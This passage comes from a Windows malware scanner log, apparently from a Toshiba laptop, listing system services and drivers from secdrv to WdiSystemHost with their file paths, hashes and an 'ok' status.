23:16:30.0541 0x0e30 secdrv - ok
23:16:30.0572 0x0e30 [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon C:\windows\system32\seclogon.dll
23:16:30.0588 0x0e30 seclogon - ok
23:16:30.0604 0x0e30 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS C:\windows\System32\sens.dll
23:16:30.0604 0x0e30 SENS - ok
23:16:30.0619 0x0e30 [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc C:\windows\system32\sensrsvc.dll
23:16:30.0635 0x0e30 SensrSvc - ok
23:16:30.0635 0x0e30 [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum C:\windows\system32\drivers\serenum.sys
23:16:30.0650 0x0e30 Serenum - ok
23:16:30.0666 0x0e30 [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial C:\windows\system32\drivers\serial.sys
23:16:30.0666 0x0e30 Serial - ok
23:16:30.0728 0x0e30 [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse C:\windows\system32\drivers\sermouse.sys
23:16:30.0728 0x0e30 sermouse - ok
23:16:30.0760 0x0e30 [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv C:\windows\system32\sessenv.dll
23:16:30.0775 0x0e30 SessionEnv - ok
23:16:30.0791 0x0e30 [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk C:\windows\system32\drivers\sffdisk.sys
23:16:30.0791 0x0e30 sffdisk - ok
23:16:30.0791 0x0e30 [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc C:\windows\system32\drivers\sffp_mmc.sys
23:16:30.0791 0x0e30 sffp_mmc - ok
23:16:30.0806 0x0e30 [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd C:\windows\system32\drivers\sffp_sd.sys
23:16:30.0806 0x0e30 sffp_sd - ok
23:16:30.0822 0x0e30 [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy C:\windows\system32\drivers\sfloppy.sys
23:16:30.0838 0x0e30 sfloppy - ok
23:16:30.0869 0x0e30 [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess C:\windows\System32\ipnathlp.dll
23:16:30.0884 0x0e30 SharedAccess - ok
23:16:30.0916 0x0e30 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\windows\System32\shsvcs.dll
23:16:30.0931 0x0e30 ShellHWDetection - ok
23:16:30.0962 0x0e30 [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2 C:\windows\system32\drivers\SiSRaid2.sys
23:16:30.0962 0x0e30 SiSRaid2 - ok
23:16:30.0994 0x0e30 [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4 C:\windows\system32\drivers\sisraid4.sys
23:16:31.0009 0x0e30 SiSRaid4 - ok
23:16:31.0025 0x0e30 [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb C:\windows\system32\DRIVERS\smb.sys
23:16:31.0025 0x0e30 Smb - ok
23:16:31.0056 0x0e30 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP C:\windows\System32\snmptrap.exe
23:16:31.0072 0x0e30 SNMPTRAP - ok
23:16:31.0087 0x0e30 [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr C:\windows\system32\drivers\spldr.sys
23:16:31.0087 0x0e30 spldr - ok
23:16:31.0134 0x0e30 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler C:\windows\System32\spoolsv.exe
23:16:31.0150 0x0e30 Spooler - ok
23:16:31.0290 0x0e30 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc C:\windows\system32\sppsvc.exe
23:16:31.0384 0x0e30 sppsvc - ok
23:16:31.0415 0x0e30 [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify C:\windows\system32\sppuinotify.dll
23:16:31.0430 0x0e30 sppuinotify - ok
23:16:31.0462 0x0e30 [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv C:\windows\system32\DRIVERS\srv.sys
23:16:31.0477 0x0e30 srv - ok
23:16:31.0508 0x0e30 [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2 C:\windows\system32\DRIVERS\srv2.sys
23:16:31.0508 0x0e30 srv2 - ok
23:16:31.0540 0x0e30 [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet C:\windows\system32\DRIVERS\srvnet.sys
23:16:31.0540 0x0e30 srvnet - ok
23:16:31.0571 0x0e30 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV C:\windows\System32\ssdpsrv.dll
23:16:31.0571 0x0e30 SSDPSRV - ok
23:16:31.0586 0x0e30 [ 1100066057FBF612B573EFD3B21383F1, 894F5A999E03807DFFEA67938D2E456D50D9E5511FE91D2E2293C51D98B3D87D ] ssmirrdr C:\windows\system32\DRIVERS\ssmirrdr.sys
23:16:31.0602 0x0e30 ssmirrdr - ok
23:16:31.0618 0x0e30 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc C:\windows\system32\sstpsvc.dll
23:16:31.0633 0x0e30 SstpSvc - ok
23:16:31.0664 0x0e30 [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor C:\windows\system32\drivers\stexstor.sys
23:16:31.0664 0x0e30 stexstor - ok
23:16:31.0711 0x0e30 [ DECACB6921DED1A38642642685D77DAC, 1633711CE973F818EBCCCA28538772431167C33ECDD44D1E846A9436598B52DC ] StillCam C:\windows\system32\DRIVERS\serscan.sys
23:16:31.0711 0x0e30 StillCam - ok
23:16:31.0805 0x0e30 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc C:\windows\System32\wiaservc.dll
23:16:31.0820 0x0e30 stisvc - ok
23:16:31.0852 0x0e30 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum C:\windows\system32\DRIVERS\swenum.sys
23:16:31.0852 0x0e30 swenum - ok
23:16:31.0883 0x0e30 [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv C:\windows\System32\swprv.dll
23:16:31.0898 0x0e30 swprv - ok
23:16:31.0992 0x0e30 [ F5B46DF59FEAA48A442AED7EEB754D4B, 8415FDD5E7B4D4819BB9B0937CDF254548C871045787958BCF708096204B1714 ] SynTP C:\windows\system32\DRIVERS\SynTP.sys
23:16:32.0039 0x0e30 SynTP - ok
23:16:32.0132 0x0e30 [ BF9CCC0BF39B418C8D0AE8B05CF95B7D, 3C13217548BE61F2BDB8BD41F77345CDDA1F97BF0AE17241C335B9807EB3DBB8 ] SysMain C:\windows\system32\sysmain.dll
23:16:32.0179 0x0e30 SysMain - ok
23:16:32.0195 0x0e30 [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\windows\System32\TabSvc.dll
23:16:32.0210 0x0e30 TabletInputService - ok
23:16:32.0226 0x0e30 [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv C:\windows\System32\tapisrv.dll
23:16:32.0242 0x0e30 TapiSrv - ok
23:16:32.0273 0x0e30 [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS C:\windows\System32\tbssvc.dll
23:16:32.0273 0x0e30 TBS - ok
23:16:32.0382 0x0e30 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] Tcpip C:\windows\system32\drivers\tcpip.sys
23:16:32.0429 0x0e30 Tcpip - ok
23:16:32.0507 0x0e30 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] TCPIP6 C:\windows\system32\DRIVERS\tcpip.sys
23:16:32.0538 0x0e30 TCPIP6 - ok
23:16:32.0569 0x0e30 [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg C:\windows\system32\drivers\tcpipreg.sys
23:16:32.0585 0x0e30 tcpipreg - ok
23:16:32.0616 0x0e30 [ FD542B661BD22FA69CA789AD0AC58C29, 75FFAF1834B1E22DF37608ED451F161052FF1FE3C681B4E20A68DCA92CC7FD8C ] tdcmdpst C:\windows\system32\DRIVERS\tdcmdpst.sys
23:16:32.0616 0x0e30 tdcmdpst - ok
23:16:32.0647 0x0e30 [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE C:\windows\system32\drivers\tdpipe.sys
23:16:32.0647 0x0e30 TDPIPE - ok
23:16:32.0678 0x0e30 [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP C:\windows\system32\drivers\tdtcp.sys
23:16:32.0678 0x0e30 TDTCP - ok
23:16:32.0725 0x0e30 [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] tdx C:\windows\system32\DRIVERS\tdx.sys
23:16:32.0741 0x0e30 tdx - ok
23:16:32.0756 0x0e30 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD C:\windows\system32\DRIVERS\termdd.sys
23:16:32.0756 0x0e30 TermDD - ok
23:16:32.0803 0x0e30 [ 4FC4C50985E5B840F4D72E57286887B8, 0BCBB4A938803AE3A3532B6D8FFC85594AA9AEF5D8F9792684841BEA8780AE9E ] TermService C:\windows\System32\termsrv.dll
23:16:32.0819 0x0e30 TermService - ok
23:16:32.0866 0x0e30 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes C:\windows\system32\themeservice.dll
23:16:32.0866 0x0e30 Themes - ok
23:16:32.0897 0x0e30 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER C:\windows\system32\mmcss.dll
23:16:32.0897 0x0e30 THREADORDER - ok
23:16:32.0975 0x0e30 [ 71C321649B28638EE80A2EEB164C1DC8, D75D296B506DCC38A4DED82C71141388AEB60B065785DCC5BC2F4B3B77ACEDC7 ] TMachInfo C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
23:16:32.0975 0x0e30 TMachInfo - ok
23:16:33.0006 0x0e30 [ 8E2C799D3476EAC32C3BA0DF7CE6AF19, CFE8A69E3F2A42C3BA2B38EC9233076D0AD32C441500E6407219F2E866905D9B ] TODDSrv C:\windows\system32\TODDSrv.exe
23:16:33.0022 0x0e30 TODDSrv - ok
23:16:33.0100 0x0e30 [ 1C73689B900428C7D054A41C4687F55C, 6DD3CDC09E4A62F40A81872789A5C8678C0FE23DD911C2951DFF5494B6BFC012 ] TosCoSrv C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
23:16:33.0115 0x0e30 TosCoSrv - ok
23:16:33.0162 0x0e30 [ 63AAFCF3EA5DBB17123E0BAE9AFE4D58, ACAD9D96CE58EDB620AC13ACA8C6F4122BA8B2AF78468A760F21A01B43D93312 ] TOSHIBA eco Utility Service C:\Program Files\TOSHIBA\TECO\TecoService.exe
23:16:33.0178 0x0e30 TOSHIBA eco Utility Service - ok
23:16:33.0193 0x0e30 [ 29D0886CF250FCEF1BF9E65AB8D2C0C8, 8D852DB100AC68A07A6E2AD21198410EAAB36E83BB8BAEA71CB698680B5DCE71 ] TOSHIBA HDD SSD Alert Service C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
23:16:33.0209 0x0e30 TOSHIBA HDD SSD Alert Service - ok
23:16:33.0256 0x0e30 [ 098B8A408C17E125A3D9A8E1166780C8, F25F09F62713C8234CB2B6A40A4455502C8004090BFB9EE9465546AD48369956 ] TPCHSrv C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
23:16:33.0287 0x0e30 TPCHSrv - ok
23:16:33.0318 0x0e30 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks C:\windows\System32\trkwks.dll
23:16:33.0318 0x0e30 TrkWks - ok
23:16:33.0365 0x0e30 [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\windows\servicing\TrustedInstaller.exe
23:16:33.0365 0x0e30 TrustedInstaller - ok
23:16:33.0396 0x0e30 [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv C:\windows\system32\DRIVERS\tssecsrv.sys
23:16:33.0396 0x0e30 tssecsrv - ok
23:16:33.0427 0x0e30 [ D11C783E3EF9A3C52C0EBE83CC5000E9, A136C355D4C8945729163D15801364A614E23217B15F9313C85BA45BB71A74EB ] TsUsbFlt C:\windows\system32\drivers\tsusbflt.sys
23:16:33.0427 0x0e30 TsUsbFlt - ok
23:16:33.0458 0x0e30 [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD C:\windows\system32\drivers\TsUsbGD.sys
23:16:33.0458 0x0e30 TsUsbGD - ok
23:16:33.0505 0x0e30 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel C:\windows\system32\DRIVERS\tunnel.sys
23:16:33.0505 0x0e30 tunnel - ok
23:16:33.0552 0x0e30 [ 550B567F9364D8F7684C3FB3EA665A72, A214BBBBAB9F0DD525FA5A818CEB8E9294B4A96676317255D7ACF6049049C933 ] TVALZ C:\windows\system32\DRIVERS\TVALZ_O.SYS
23:16:33.0552 0x0e30 TVALZ - ok
23:16:33.0568 0x0e30 [ 9C7191F4B2E49BFF47A6C1144B5923FA, DF4E663499946F4E68B7528CA399574D1EB69797FF81F681943B84F3E5E6A40E ] TVALZFL C:\windows\system32\DRIVERS\TVALZFL.sys
23:16:33.0583 0x0e30 TVALZFL - ok
23:16:33.0583 0x0e30 [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35 C:\windows\system32\drivers\uagp35.sys
23:16:33.0614 0x0e30 uagp35 - ok
23:16:33.0630 0x0e30 [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs C:\windows\system32\DRIVERS\udfs.sys
23:16:33.0630 0x0e30 udfs - ok
23:16:33.0677 0x0e30 [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect C:\windows\system32\UI0Detect.exe
23:16:33.0677 0x0e30 UI0Detect - ok
23:16:33.0739 0x0e30 [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx C:\windows\system32\drivers\uliagpkx.sys
23:16:33.0739 0x0e30 uliagpkx - ok
23:16:33.0770 0x0e30 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus C:\windows\system32\DRIVERS\umbus.sys
23:16:33.0770 0x0e30 umbus - ok
23:16:33.0817 0x0e30 [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass C:\windows\system32\drivers\umpass.sys
23:16:33.0817 0x0e30 UmPass - ok
23:16:33.0833 0x0e30 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost C:\windows\System32\upnphost.dll
23:16:33.0848 0x0e30 upnphost - ok
23:16:33.0880 0x0e30 [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] usbccgp C:\windows\system32\DRIVERS\usbccgp.sys
23:16:33.0880 0x0e30 usbccgp - ok
23:16:33.0911 0x0e30 [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir C:\windows\system32\drivers\usbcir.sys
23:16:33.0911 0x0e30 usbcir - ok
23:16:33.0958 0x0e30 [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] usbehci C:\windows\system32\DRIVERS\usbehci.sys
23:16:33.0958 0x0e30 usbehci - ok
23:16:33.0989 0x0e30 [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] usbhub C:\windows\system32\DRIVERS\usbhub.sys
23:16:34.0004 0x0e30 usbhub - ok
23:16:34.0020 0x0e30 [ 765A92D428A8DB88B960DA5A8D6089DC, 56DE8A2ED58E53B202C399CA7BACB1551136303C2EE0AB426BDBBF880E3C542C ] usbohci C:\windows\system32\DRIVERS\usbohci.sys
23:16:34.0020 0x0e30 usbohci - ok
23:16:34.0067 0x0e30 [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint C:\windows\system32\DRIVERS\usbprint.sys
23:16:34.0067 0x0e30 usbprint - ok
23:16:34.0098 0x0e30 [ 9661DA76B4531B2DA272ECCE25A8AF24, FEA93254A21E71A7EB8AD35FCCAD2C1E41F7329EC33B1734F5B41307A34D8637 ] usbscan C:\windows\system32\DRIVERS\usbscan.sys
23:16:34.0098 0x0e30 usbscan - ok
23:16:34.0114 0x0e30 [ FED648B01349A3C8395A5169DB5FB7D6, DC4D7594C24ADD076927B9347F1B50B91CF03A4ABDB284248D5711D9C19DEB96 ] USBSTOR C:\windows\system32\DRIVERS\USBSTOR.SYS
23:16:34.0114 0x0e30 USBSTOR - ok
23:16:34.0145 0x0e30 [ DD253AFC3BC6CBA412342DE60C3647F3, 146F8613F1057AC054DC3593E84BC52899DA27EA33B0E72ACFB78C3699ADCDE7 ] usbuhci C:\windows\system32\drivers\usbuhci.sys
23:16:34.0145 0x0e30 usbuhci - ok
23:16:34.0192 0x0e30 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo C:\windows\System32\Drivers\usbvideo.sys
23:16:34.0192 0x0e30 usbvideo - ok
23:16:34.0223 0x0e30 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms C:\windows\System32\uxsms.dll
23:16:34.0223 0x0e30 UxSms - ok
23:16:34.0254 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc C:\windows\system32\lsass.exe
23:16:34.0254 0x0e30 VaultSvc - ok
23:16:34.0285 0x0e30 [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot C:\windows\system32\drivers\vdrvroot.sys
23:16:34.0285 0x0e30 vdrvroot - ok
23:16:34.0316 0x0e30 [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds C:\windows\System32\vds.exe
23:16:34.0348 0x0e30 vds - ok
23:16:34.0348 0x0e30 [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga C:\windows\system32\DRIVERS\vgapnp.sys
23:16:34.0363 0x0e30 vga - ok
23:16:34.0363 0x0e30 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave C:\windows\System32\drivers\vga.sys
23:16:34.0363 0x0e30 VgaSave - ok
23:16:34.0394 0x0e30 [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp C:\windows\system32\drivers\vhdmp.sys
23:16:34.0394 0x0e30 vhdmp - ok
23:16:34.0426 0x0e30 [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide C:\windows\system32\drivers\viaide.sys
23:16:34.0426 0x0e30 viaide - ok
23:16:34.0472 0x0e30 [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr C:\windows\system32\drivers\volmgr.sys
23:16:34.0472 0x0e30 volmgr - ok
23:16:34.0504 0x0e30 [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx C:\windows\system32\drivers\volmgrx.sys
23:16:34.0519 0x0e30 volmgrx - ok
23:16:34.0550 0x0e30 [ DF8126BD41180351A093A3AD2FC8903B, AEFF4AA89CDDAAAD43CDE17C6B6EB2A397A0AC1651CBD51B889161EC2BC6527A ] volsnap C:\windows\system32\drivers\volsnap.sys
23:16:34.0550 0x0e30 volsnap - ok
23:16:34.0582 0x0e30 [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid C:\windows\system32\drivers\vsmraid.sys
23:16:34.0597 0x0e30 vsmraid - ok
23:16:34.0660 0x0e30 [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS C:\windows\system32\vssvc.exe
23:16:34.0706 0x0e30 VSS - ok
23:16:34.0738 0x0e30 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus C:\windows\system32\DRIVERS\vwifibus.sys
23:16:34.0738 0x0e30 vwifibus - ok
23:16:34.0769 0x0e30 [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt C:\windows\system32\DRIVERS\vwififlt.sys
23:16:34.0769 0x0e30 vwififlt - ok
23:16:34.0816 0x0e30 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\windows\system32\w32time.dll
23:16:34.0831 0x0e30 W32Time - ok
23:16:34.0847 0x0e30 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\windows\system32\drivers\wacompen.sys
23:16:34.0847 0x0e30 WacomPen - ok
23:16:34.0862 0x0e30 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\windows\system32\DRIVERS\wanarp.sys
23:16:34.0878 0x0e30 WANARP - ok
23:16:34.0878 0x0e30 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\windows\system32\DRIVERS\wanarp.sys
23:16:34.0878 0x0e30 Wanarpv6 - ok
23:16:34.0987 0x0e30 [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc C:\windows\system32\Wat\WatAdminSvc.exe
23:16:35.0018 0x0e30 WatAdminSvc - ok
23:16:35.0096 0x0e30 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\windows\system32\wbengine.exe
23:16:35.0143 0x0e30 wbengine - ok
23:16:35.0174 0x0e30 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\windows\System32\wbiosrvc.dll
23:16:35.0174 0x0e30 WbioSrvc - ok
23:16:35.0206 0x0e30 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\windows\System32\wcncsvc.dll
23:16:35.0221 0x0e30 wcncsvc - ok
23:16:35.0237 0x0e30 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\windows\System32\WcsPlugInService.dll
23:16:35.0252 0x0e30 WcsPlugInService - ok
23:16:35.0268 0x0e30 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\windows\system32\drivers\wd.sys
23:16:35.0268 0x0e30 Wd - ok
23:16:35.0377 0x0e30 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\windows\system32\drivers\Wdf01000.sys
23:16:35.0393 0x0e30 Wdf01000 - ok
23:16:35.0424 0x0e30 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\windows\system32\wdi.dll
23:16:35.0424 0x0e30 WdiServiceHost - ok
23:16:35.0424 0x0e30 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\windows\system32\wdi.dll
23:16:35.0440 0x0e30 WdiSystemHost - ok
